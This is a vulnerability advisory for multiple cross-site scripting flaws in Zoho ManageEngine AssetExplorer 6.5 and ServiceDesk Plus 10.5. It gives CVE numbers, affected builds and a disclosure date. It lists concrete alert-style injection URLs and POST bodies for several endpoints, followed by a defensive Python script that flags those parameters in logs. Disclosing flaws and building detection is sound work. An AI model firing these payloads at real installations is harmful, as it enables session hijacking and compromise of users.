Zoho ManageEngine AssetExplorer Multiple Cross Site Scripting Vulnerabilities

Summary

A Cross-Site Scripting vulnerability was discovered in Zoho ManageEngine AssetExplorer.

Credit:

The information has been provided by The Tarantula Team.

The original article can be found at:

https://github.com/tarantula-team/Multiple-Cross-Site-Scripting-vulnerabilities-in-Zoho-ManageEngine


Details

Zoho ManageEngine AssetExplorer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

Zoho ManageEngine ServiceDesk Plus 10.5 Cross-Site Scripting vulnerability

Payload: send an HTTP POST request to https://victim.com/SearchN.do with the following body:

searchText=%27%3E%3Csvg+onload%3Dalert%28%27xss%27%29%3E&subModSelText=&selectName=Purchase&selectName=Purchase&selectedName=Purchase&submitbutton=GO

CVE-2019-12540

Zoho ManageEngine ServiceDesk Plus 10.5 Cross-Site Scripting vulnerability

Payload:

https://victim.com/WorkOrder.do?woMode=viewWO5%27%3balert(%27XSS%27)%2f%2f

Zoho ManageEngine AssetExplorer 6.5 Cross-Site Scripting vulnerability

Payload:

https://victim.com/RCSettings.do?rdsName=Windows%20Remote%20Desktop%00zc6p3%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Ekgo&description=This+tool+uses+the+windows+utility+%27mstsc%27+to+take+remote+and+it+is+available+by+default+in+windows+machines.&OS_COMMAND_1=mstsc+%2Fv%3A%24DEVICENAME&OS_TARGET_1_1=1&OS_COMMAND_2=&saveRds=Save&rdsId=2

Zoho ManageEngine AssetExplorer 6.5 Cross-Site Scripting vulnerability

Payload:

https://victim.com/SoftwareListView.do?softwareManufacturer=-1&site=-1&swType=488529);alert(%27XSS%27)%2f%2f298&swComplianceType=0&fromSoftwareHome=true&showZeroCount=false

Zoho ManageEngine AssetExplorer 6.5 Cross-Site Scripting vulnerability

Payload:

https://victim.com/asset/ResourcesAttachments.jsp?type=new&wsID=87&date=1559400074944&pageName=a%22%3E%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E

Zoho ManageEngine AssetExplorer 6.5 Cross-Site Scripting vulnerability

Payload:

Send an HTTP POST request to https://victim.com/SearchN.do with the following body:

selectName=Purchase&searchText=%27%3E%3Csvg+onload%3Dalert%28%27xss%27%29%3E&submitbutton=%C2%A0
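
For defenders reviewing proxy or web-server logs, the endpoints and parameters listed above can be turned into a simple triage check. The following is an added example, not part of the original advisory or of any Zoho code; the metacharacter set and the function name flagged_params are assumptions, and the sample requests are constructed (two reuse values shown above).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path -> parameter that carries the payload in the advisory's requests.
WATCHED = {
    "/SearchN.do": "searchText",
    "/WorkOrder.do": "woMode",
    "/RCSettings.do": "rdsName",
    "/SoftwareListView.do": "swType",
    "/asset/ResourcesAttachments.jsp": "pageName",
}

# Assumption: markup and script metacharacters (and NUL) are not expected in
# these parameters; tune per deployment, searchText in particular.
METACHARS = re.compile(r"[<>\"'();\x00]")


def flagged_params(target, body=""):
    """Return watched parameter names whose decoded value has metacharacters.

    target is the request path plus query string; body is a URL-encoded
    form body for POST requests (empty for GET).
    """
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path)
    if watched is None:
        return []
    # parse_qsl percent-decodes values and turns '+' into a space.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return sorted({name for name, value in pairs
                   if name == watched and METACHARS.search(value)})


# Constructed sample requests: (target, form body).
SAMPLES = [
    ("/WorkOrder.do?woMode=viewWO", ""),
    ("/WorkOrder.do?woMode=viewWO5%27%3balert(%27XSS%27)%2f%2f", ""),
    ("/SoftwareListView.do?site=-1&swType=488529&swComplianceType=0", ""),
    ("/SearchN.do",
     "selectName=Purchase&searchText=%27%3E%3Csvg+onload%3Dalert%28%27xss%27%29%3E"),
    ("/Other.do?q=%3Cb%3E", ""),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        hits = flagged_params(target, body)
        print("ALERT" if hits else "ok   ", target, hits)
```

Free-text fields such as searchText can legitimately contain quotes or parentheses, so treat hits on that parameter as leads to review rather than confirmed attempts.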

Vulnerable Systems:

Zohocorp ManageEngine AssetExplorer 6.5 Build 6501
Zohocorp ManageEngine AssetExplorer 6.5 Build 6500

CVE Information:

CVE-2019-12595
CVE-2019-12596
CVE-2019-12597
CVE-2019-12537

Disclosure Timeline:

Published Date: 07/16/2019